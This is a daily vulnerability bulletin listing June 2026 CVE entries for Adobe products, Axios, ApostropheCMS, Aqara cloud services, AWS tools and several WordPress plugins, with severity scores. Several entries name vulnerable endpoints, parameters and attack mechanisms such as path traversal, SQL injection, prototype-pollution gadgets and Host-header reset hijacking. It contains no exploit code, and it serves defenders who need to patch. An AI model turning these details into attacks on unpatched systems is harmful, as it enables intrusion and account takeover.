The Computer Maintenance Center updates the following computer virus and intrusion alerts every day. Please take note early, to avoid data loss or hardware damage caused by virus infection!
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| AdguardTeam--AdGuardHome | AdGuard Home, when started with the --glinet flag, contains an authentication bypass vulnerability that allows unauthenticated attackers to gain full admin access by supplying a path traversal sequence in the Admin-Token cookie, exploiting unsanitized string concatenation in the token file path construction within the authglinet middleware. Attackers can craft a request with a traversal payload in the Admin-Token header to redirect file reads to arbitrary paths. | 2026-06-08 | 9.4 | CVE-2026-41448 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47911 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47912 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47913 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47914 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47915 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47916 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47917 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47918 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47919 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47920 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47921 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 7.4 | CVE-2026-47937 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47952 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47955 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47959 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-12 | 7.8 | CVE-2026-47965 |
| Adobe--Adobe Campaign Classic (ACC) | Adobe Campaign Classic (ACC) versions 7.4.3 build 9394 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in privilege escalation. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 10 | CVE-2026-47938 |
| Adobe--Adobe Campaign Classic (ACC) | Adobe Campaign Classic (ACC) versions 7.4.3 build 9394 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 10 | CVE-2026-48303 |
| Adobe--Adobe Experience Manager Forms JEE | Adobe Experience Manager Forms JEE versions LTS SP1, 6.5.24.0 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed. | 2026-06-09 | 9.3 | CVE-2026-34691 |
| Adobe--Adobe Experience Manager Forms JEE | Adobe Experience Manager Forms JEE versions LTS SP1, 6.5.24.0 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed. | 2026-06-09 | 8 | CVE-2026-34693 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 7.5 | CVE-2026-34711 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Improper Input Validation vulnerability. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 7.5 | CVE-2026-34712 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 7.5 | CVE-2026-34713 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 9.6 | CVE-2026-47928 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. A high-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 8.4 | CVE-2026-47929 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized read and write access. Exploitation of this issue does not require user interaction. | 2026-06-09 | 8.1 | CVE-2026-47930 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 8.4 | CVE-2026-47931 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 8.8 | CVE-2026-47932 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 7.4 | CVE-2026-47960 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by a Dependency on Vulnerable Third-Party Component vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 8.6 | CVE-2026-47906 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 8.2 | CVE-2026-47907 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47908 |
| Adobe--Format Plugins | Format Plugins versions 1.1.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48291 |
| Adobe--Format Plugins | Format Plugins versions 1.1.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48292 |
| Adobe--InCopy | InCopy versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34706 |
| Adobe--InCopy | InCopy versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34707 |
| Adobe--InCopy | InCopy versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34708 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34695 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34696 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34697 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34698 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34699 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34700 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34701 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34702 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48293 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34709 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34710 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48305 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48306 |
| Amasty--Order Attributes for Magento 2 | Amasty Order Attributes for Magento 2 before version 4.0.0 contains an unauthenticated arbitrary file upload vulnerability that allows unauthenticated attackers to write arbitrary files to the store's media directory by submitting files of any type or name to the upload endpoint without authentication, session validation, or cart context. Attackers can upload PHP files to achieve remote code execution on servers where the media directory permits PHP execution, or alternatively enable malware hosting, stored cross-site scripting via HTML or SVG uploads, and path traversal to write files outside the intended upload directory. | 2026-06-12 | 9.8 | CVE-2026-53787 |
| AmentoTech--Doctreat Core | The Doctreat Core plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.6.8. This is due to the doctreat_process_registration() function not properly restricting the roles that a user can register with. This makes it possible for unauthenticated attackers to register as an administrator user. | 2026-06-10 | 9.8 | CVE-2025-6254 |
| apostrophecms--@apostrophecms/seo | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 1.4.2 of the `@apostrophecms/seo` package inject the Google Analytics Tracking ID (`seoGoogleTrackingId`) and Google Tag Manager ID (`seoGoogleTagManager`) directly into `<script>` tag bodies using JavaScript template literals without any sanitization or validation. Any user with editor-level access (the default role for content managers) can set these fields to a malicious value, resulting in stored XSS that executes on every page for every visitor of the site. As of time of publication, no known patched versions are available. | 2026-06-12 | 8.7 | CVE-2026-53608 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. In versions up to and including 4.30.0, `apos.util.set()` traverses dot-notation paths without sanitizing `__proto__`, allowing an authenticated editor to write arbitrary values to `Object.prototype` via the `$pullAll` patch operator. A confirmed gadget in `publicApiCheck()` causes this to bypass authorization on all piece-type REST API endpoints for every subsequent unauthenticated request, for the lifetime of the Node.js process. As of time of publication, no known patched versions are available. | 2026-06-12 | 9.1 | CVE-2026-53609 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 4.29.0 have a password reset flow that constructs the reset URL using `req.hostname`, which is derived directly from the attacker-controlled HTTP `Host` header when `apos.baseUrl` is not explicitly configured. An unauthenticated attacker who knows a victim's email address can send a crafted reset request that causes the application to email the victim a reset link pointing to the attacker's domain. When the victim clicks the link, the valid reset token is delivered to the attacker, enabling full account takeover. As of time of publication, no known patched versions are available. | 2026-06-12 | 8.1 | CVE-2026-45013 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Version 4.29.0 has a stored cross-site scripting vulnerability in the image widget functionality. A user with the Editor role can configure an image widget link to use a javascript: URL payload. Because editors have permission to publish pages, the malicious widget can be published to the live site. When another user, including an administrator or public visitor, clicks the affected image/link, arbitrary JavaScript executes in the victim's browser. As of time of publication, no known patched versions are available. | 2026-06-12 | 7.3 | CVE-2026-45011 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 4.29.0 contain an authenticated server-side request forgery (SSRF) in the rich-text widget import flow. An authenticated user who can submit/edit rich-text widget content can cause the server to fetch attacker-controlled URLs during widget validation. For image-compatible responses, the fetched content can be persisted and re-hosted by Apostrophe, allowing response exfiltration. As of time of publication, no known patched versions are available. | 2026-06-12 | 7.6 | CVE-2026-45012 |
| apostrophecms--sanitize-html | ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: 'discard'` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue. | 2026-06-12 | 9.3 | CVE-2026-44990 |
| Apptha--Apptha Slider Gallery | Apptha Slider Gallery 1.0 contains a path traversal vulnerability that allows unauthenticated attackers to download arbitrary files by manipulating the imgname parameter. Attackers can send requests to asgallDownload.php with directory traversal sequences ../ to access sensitive files outside the intended directory. | 2026-06-09 | 7.5 | CVE-2017-20248 |
| Apptha--Apptha Slider Gallery | Apptha Slider Gallery 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the albid parameter. Attackers can send GET requests with crafted SQL payloads in the albid parameter to extract sensitive database information including user credentials and authentication hashes. | 2026-06-09 | 8.2 | CVE-2017-20249 |
| Apptha--Mac Photo Gallery | Mac Photo Gallery 3.0 contains a path traversal vulnerability that allows unauthenticated attackers to download arbitrary files by manipulating the albid parameter. Attackers can send requests to macdownload.php with directory traversal sequences to access sensitive files like wp-load.php outside the intended plugin directory. | 2026-06-09 | 7.5 | CVE-2017-20250 |
| Apptha--PICA Photo Gallery | WordPress Plugin PICA Photo Gallery 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the aid parameter. Attackers can send GET requests with crafted SQL payloads in the aid parameter to extract sensitive database information including user credentials and table contents. | 2026-06-09 | 8.2 | CVE-2017-20247 |
| Aqara--Aqara Developer Portal | The Aqara Developer Portal (developer.aqara.com) and shared test environments (developer-test.aqara.com, aiot-test.aqara.com) exhibit cross-origin request sharing, which is an instance of "CWE-942: Permissive Cross-domain Policy with Untrusted Domains," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N (8.2 High). | 2026-06-12 | 8.2 | CVE-2026-50088 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO gateway (gw-builder.aqara.com) exposes bidirectional AES round-trips against the platform's signing key without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and "CWE-327: Use of a Broken or Risky Cryptographic Algorithm," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High). | 2026-06-12 | 10 | CVE-2026-50086 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO gateway (gw-builder.aqara.com) exhibits a cross-origin request sharing vulnerability, which is an instance of "CWE-942: Permissive Cross-domain Policy with Untrusted Domains," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N (8.2 High). | 2026-06-12 | 8.2 | CVE-2026-50087 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO Gateway (gw-builder.aqara.com) used a hardcoded OAuth client credential, which is an instance of "CWE-798: Use of Hard-coded Credentials." This issue has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 Critical). When combined with CVE-2026-50082, CVE-2026-50084, and CVE-2026-50085, this can lead to a fully unauthenticated, remote takeover of affected devices. | 2026-06-12 | 9.1 | CVE-2026-50083 |
| Aqara--Board service | The Aqara Board service (op-test.aqara.com) accepts arbitrary MQTT command payloads and forwards them to the platform's HiveMQ broker without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L (8.6 High). When combined with CVE-2026-50082, CVE-2026-50083, and CVE-2026-50084, this can lead to a fully unauthenticated, remote takeover of affected devices. | 2026-06-12 | 8.6 | CVE-2026-50085 |
| Aqara--Cloud OAuth Authorization Endpoint | The Aqara Cloud OAuth Authorization Endpoint (open-cn.aqara.com/oauth/authorize) is vulnerable to a redirect bypass due to lax controls on domain matching, which is an instance of "CWE-1289: Improper Validation of Unsafe Equivalence in Input" and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N (9.3 Critical). | 2026-06-12 | 9.3 | CVE-2026-50090 |
| Aqara--Cloud Production API | The Aqara Cloud Production API (open-cn.aqara.com/v3.0/open/api) would authorize any valid developer token for access to any account. This is an instance of "CWE-862: Missing Authorization" with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N (9.6 Critical). When combined with CVE-2026-50082, CVE-2026-50083, and CVE-2026-50085, this can lead to a fully unauthenticated, remote takeover of affected devices. | 2026-06-12 | 9.6 | CVE-2026-50084 |
| Aqara--com.lumiunited.aqarahome | Aqara Home Android (com.lumiunited.aqarahome) 6.0.0 (and white-label clients embedding the same liblumidevsdk.so) uses hard-coded cryptographic keys, which is an instance of "CWE-321: Use of Hard-coded Cryptographic Key" and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 Critical). | 2026-06-12 | 9.1 | CVE-2026-50091 |
| ArnasDon--wacrm | WACRM prior to commit 73041bf contains an authorization bypass vulnerability in the automation engine that allows authenticated attackers to access and modify contacts belonging to other tenants by supplying an arbitrary caller-controlled contact_id in the POST request body without tenant ownership verification. Attackers can exploit the service-role client that bypasses row-level security to modify victim contact fields including name, email, and company across tenant boundaries using only a known contact UUID. | 2026-06-08 | 7.1 | CVE-2026-49141 |
| AWS--AgentCore CLI | Improper neutralization of triple-quote characters during Python code generation in AgentCore CLI before v0.14.2 might allow an authenticated remote threat actor to execute arbitrary code on AWS AgentCore Runtime under the imported agent's IAM execution role and on the local environment of another user in the same AWS account, via a crafted collaborationInstruction stored on a Bedrock Agent collaborator and later processed by that other user during agent import. To remediate this issue, users should upgrade to version 0.14.2. | 2026-06-08 | 9 | CVE-2026-11393 |
| AWS--AWS Cloud Development Kit library | OS command injection in the NodejsFunction local bundling pipeline in aws-cdk-lib before 2.245.0 (2.246.0 on Windows) might allow an actor who controls the value of one or more bundling properties (externalModules, define, loader, inject, or esbuildArgs) to execute arbitrary commands on the host running the CDK toolchain via injected shell metacharacters. This issue requires the threat actor to control the value of one or more of the affected bundling properties in the CDK application. To remediate this issue, users should upgrade to aws-cdk-lib 2.245.0 (2.246.0 on Windows) or later. | 2026-06-10 | 7.3 | CVE-2026-11417 |
| AWS--aws-c-http | Improper handling of HPACK dynamic table size updates in the AWS Common Runtime aws-c-http library might allow a remote threat actor operating a server to cause memory corruption on a connecting client application, potentially leading to arbitrary code execution, via a crafted sequence of HTTP/2 HEADERS frames. To remediate this issue, users should upgrade to aws-c-http version 0.11.0. | 2026-06-12 | 8.8 | CVE-2026-12043 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as 127.0.0.1 or 169.254.169.254, a request URL using the IPv4-mapped IPv6 form (::ffff:7f00:1, ::ffff:a9fe:a9fe) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 8.6 | CVE-2026-44492 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack - intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0. | 2026-06-11 | 8.7 | CVE-2026-44494 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios' Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 7.5 | CVE-2026-44486 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Axios versions 1.7.0 through 1.15.x did not enforce configured request and response size limits when requests were sent with the fetch adapter. Applications that selected adapter: 'fetch', or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than maxContentLength or maxBodyLength despite those limits being explicitly configured. This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large data: URL, or when an application forwards attacker-controlled request bodies through axios while relying on maxBodyLength as a boundary. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 7.5 | CVE-2026-44488 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From 0.19.0 to before 0.31.1 and 1.15.2, Axios contains prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted Object.prototype.transformResponse, affected Axios versions may treat that inherited value as request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request. This vulnerability is fixed in 0.31.1 and 1.15.2. | 2026-06-11 | 7 | CVE-2026-44495 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie. The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 7.5 | CVE-2026-44496 |
| Başarsoft Information Technologies Inc.--Rotaban | Unrestricted upload of file with dangerous type vulnerability in Başarsoft Information Technologies Inc. Rotaban allows Upload a Web Shell to a Web Server. This issue affects Rotaban: from V2026.06.002 before V2026.06.003. | 2026-06-11 | 9.9 | CVE-2026-11839 |
| Başbelen Group Food Cafe Businesses Industry and Trade Ltd. Co.--Pause+ Mobile App | Improper restriction of excessive authentication attempts vulnerability in Başbelen Group Food Cafe Businesses Industry and Trade Ltd. Co. Pause+ Mobile App allows Authentication Bypass. This issue affects Pause+ Mobile App: from v1.0.6 before v1.5. | 2026-06-12 | 9.8 | CVE-2026-6853 |
| background-image-cropper--Background Image Cropper | WordPress Background Image Cropper version 1.2 contains a remote code execution vulnerability that allows unauthenticated attackers to upload arbitrary files by accessing the ups.php endpoint. Attackers can upload PHP files through the file upload form in the plugin directory to execute arbitrary code on the server. | 2026-06-08 | 9.8 | CVE-2024-58348 |
| Beardev--JoomSport | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue affects JoomSport: from n/a through 5.7.7. | 2026-06-11 | 9.3 | CVE-2026-42647 |
